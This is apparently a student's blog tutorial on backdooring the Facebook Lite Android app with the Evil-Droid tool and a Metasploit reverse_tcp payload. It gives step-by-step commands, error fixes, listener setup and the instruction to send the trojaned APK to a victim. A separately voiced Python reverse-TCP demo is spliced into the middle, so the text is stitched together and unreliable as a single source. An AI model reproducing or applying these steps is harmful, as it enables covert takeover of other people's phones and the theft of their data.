Hack Android with an Injected Malicious Application.

SLIIT CS2
6 min read · Jun 2, 2021

Hope your Firewall Works. If not, You are Screwed.

Where to begin with, hmmm…

Here we are using the Kali Linux 2020 distribution with updated tools. Evil-Droid is downloaded from GitHub and installed as its README describes.

https://github.com/M4sc3r4n0/Evil-Droid

The method I am using here works when the attacker and the victim are on the same network, because the payload connects back to the private LAN address of the attacker's machine. With a few knobs tuned (a listener reachable on a public IP, or a port forwarded to it) the same method can be used from outside the network.

The coolest thing about Evil-Droid is that it is super easy to use and control. It depends on several other tools, and if any of them are missing when we launch the attack, Evil-Droid identifies the missing dependencies and installs them for us.

In my case, no dependencies were installed at first, but in a single execution the missing dependencies were installed on my Kali Linux. The other thing is that this tool injects its payload into a fully working application rather than shipping a stand-alone malicious app: the application keeps working normally, which is what hides the backdoor from the user, and the backdoor connects back to us every time the user opens the application. Two caveats a practitioner should keep in mind: the rebuilt APK is re-signed with a new key, so it cannot be installed as an update over the genuine app and the user has to allow installs from unknown sources; and the payload is the stock Metasploit one, so do not expect it to slip past Play Protect or antivirus on its own.

Next you need an APK to backdoor, downloaded to your system. I downloaded the latest version of the Facebook Lite APK.

So, What is Android?

Android is a mobile operating system based on a modified version of the Linux kernel and other open source software, designed primarily for touchscreen mobile devices such as smartphones and tablets. It is developed by a consortium of developers known as the Open Handset Alliance, with Google as the main contributor and commercial marketer. Initially developed by Android Inc., which Google bought in 2005, Android was unveiled in 2007, and the first commercial Android device launched in September 2008. At the time of writing the current stable version is Android 11, released on September 8, 2020. The core Android source code is known as the Android Open Source Project (AOSP) and is primarily licensed under the Apache License. This has allowed variants of Android to be developed for a range of other electronics, such as game consoles, digital cameras and PCs, each with a specialized user interface. Well-known derivatives include Android TV for televisions and Wear OS for wearables, both developed by Google.

What's Next?

1. Launch the Evil-Droid script after getting it from GitHub (clone or zip), making sure the evil-droid script is executable. It automatically checks for missing dependencies and installs them.

cd Evil-Droid

./evil-droid

2. After a successful launch, the menu appears on the screen. We are going with option 3 to create a backdoor in the Facebook Lite APK.

(You may first hit an error from the JDK/apktool dependencies: the script reports that it has failed to verify signed artifacts. The fix I used is below.)

Failed to verify signed artifacts [Fixed]

I just did these steps and it worked well for me:

First I downloaded the latest version of apktool (2.4.1) from https://bitbucket.org/iBotPeaches/apktool/downloads/

Then I renamed apktool_2.4.1.jar to apktool.jar, replaced ~path/Evil-Droid/tools/apktool.jar with it, and changed the version number in doc.txt to the downloaded apktool version (2.4.1 for me).

And then I installed openjdk-11-jdk-headless [sudo apt-get install openjdk-11-jdk-headless].

3. Before it starts, the script asks for permission to start the Metasploit framework, PostgreSQL and the Apache2 server services. We have to give permission to continue.

4. Then select option 3 (Backdoor APK Original New) from the menu.

5. It then detects our IP address and asks whether to continue with it or to enter another one; a window opens for this automatically. The same is done for the port number: the default is 4444, which is fine. This IP and port become the payload's LHOST and LPORT, the address the phone will connect back to, so the IP must be one the victim device can actually reach (our LAN address when both are on the same network). Then it asks for the name of the modified application; here we give it as Facebook_lite_new.apk.

6. Then it asks us to select the payload. For this I am selecting the reverse_tcp payload.

What is reverse_tcp?

Firewalls (and the NAT on a typical home or mobile network) work on the principle of blocking unsolicited incoming connections. Any connection attempt from outside to a host behind the firewall is blocked, while return traffic for a connection the host itself initiated is permitted.

Reverse TCP is built on exactly that. Instead of the attacker initiating a connection to the device, which the firewall blocks, the device initiates the connection to the attacker, which the firewall allows.

  • When your browser initiates a connection to google.com, we call it a forward connection. The connection goes from the client (browser) to the server (google.com).
  • When the server wants to initiate a connection to the client (rare in normal traffic), we call it a reverse connection.
  • Inbound connections to a device behind a firewall or NAT are normally blocked. So even with our payload running on the phone, we cannot open a connection in to it.
  • Most firewalls, however, allow connections initiated from the inside to the external world.
  • So the payload on the compromised device connects out to our listener on LHOST:LPORT, and we issue commands to the device over that connection.

That's a reverse connection!
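To make the direction of traffic concrete, here is an added example (my own code for this page, not from the original post and not Evil-Droid or Metasploit code) that runs both ends of a reverse-TCP session in one Python process over loopback. The handler side only binds, listens and accepts, exactly like exploit/multi/handler; the payload side opens the outbound connection and then answers commands. The "shell" on the victim is a constructed table of fake command outputs so nothing is actually executed; LHOST, the sample commands and their outputs are all made up for the demo.

```python
"""Reverse-TCP in miniature: the victim connects OUT to the attacker's listener."""
import socket
import threading

LHOST = "127.0.0.1"  # attacker address the payload connects back to (loopback for the demo)

# Constructed sample "command -> output" table standing in for a real shell on the phone.
FAKE_SHELL = {
    "id": "uid=10123(u0_a123) gid=10123(u0_a123)",
    "getprop ro.build.version.release": "10",
}


def start_handler(lhost=LHOST, lport=0):
    """Attacker side (the role of exploit/multi/handler): bind and listen, never dial out.

    lport=0 lets the OS pick a free port; a real handler would use LPORT, e.g. 4444.
    Returns the listening socket and the port actually bound.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def _read_line(rfile):
    """Read one newline-terminated line from a socket file object; None on EOF."""
    line = rfile.readline()
    return line.rstrip(b"\n").decode() if line else None


def payload_connect_back(lhost, lport, shell):
    """Victim side (the role of the injected payload): open an OUTBOUND connection
    to LHOST:LPORT, then answer one command per line until told to exit.

    Outbound traffic is what a firewall/NAT in front of the device normally allows,
    which is why this direction works when an inbound connection would not.
    """
    with socket.create_connection((lhost, lport), timeout=5) as s:
        rfile = s.makefile("rb")
        while True:
            cmd = _read_line(rfile)
            if cmd is None or cmd == "exit":
                break
            s.sendall((shell.get(cmd, f"sh: {cmd}: not found") + "\n").encode())


def run_session(commands, shell=FAKE_SHELL):
    """Run one complete reverse-TCP session over loopback; return {command: output}."""
    srv, lport = start_handler()
    victim = threading.Thread(target=payload_connect_back, args=(LHOST, lport, shell))
    victim.start()
    conn, _peer = srv.accept()  # the device shows up here; the handler never dialled it
    conn.settimeout(5)
    results = {}
    with conn:
        rfile = conn.makefile("rb")
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
            results[cmd] = _read_line(rfile)
        conn.sendall(b"exit\n")
    victim.join(timeout=5)
    srv.close()
    return results


def forward_connect_attempt(host=LHOST):
    """Forward direction for contrast: the attacker tries to connect IN to the device.

    Here the 'device' has nothing listening, so the attempt is refused. Behind a real
    firewall the packets would more likely be dropped silently; either way, no session.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind((host, 0))
    closed_port = probe.getsockname()[1]
    probe.close()  # nothing listens on closed_port any more
    try:
        socket.create_connection((host, closed_port), timeout=2).close()
        return True
    except OSError:
        return False


if __name__ == "__main__":
    print("forward connection into the device succeeded:", forward_connect_attempt())
    for cmd, out in run_session(["id", "getprop ro.build.version.release", "ls"]).items():
        print(f"{cmd!r} -> {out!r}")
```

Swap the loopback address for your LAN IP and the ephemeral port for 4444 and this has the same shape as Evil-Droid's reverse_tcp payload talking to exploit/multi/handler. Across the Internet the address the payload connects to has to be a public one, or a port forwarded to the listener, which is the "tuning the knobs" mentioned earlier.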

7. Then we have to select the original APK path. This is easy: no commands need to be typed, a file dialog opens and we simply point it at the original APK's location.

8. The rest of the process is automatic, and afterwards we can pick up the injected, modified APK file from the location where we installed Evil-Droid.

9. Finally it asks whether to start listening for the APK with the Metasploit framework. We choose multi-handler, which must use the same payload, LHOST and LPORT chosen in steps 5 and 6 or the phone's connection will have nothing to reach, then send our malicious APK to the victim and do the magic.

So that's all for now. The APK keeps working as it should while giving us a simple backdoor on the victim's mobile.

In the next article we can discuss what to do with this APK file and how the victim's mobile will respond.

Peace. Drink Responsibly :)

Written by Chamod Wijetunga, Information Security Analyst (Intern) at CryptoGen, 3rd Year 2nd Semester Cyber Security Student at SLIIT
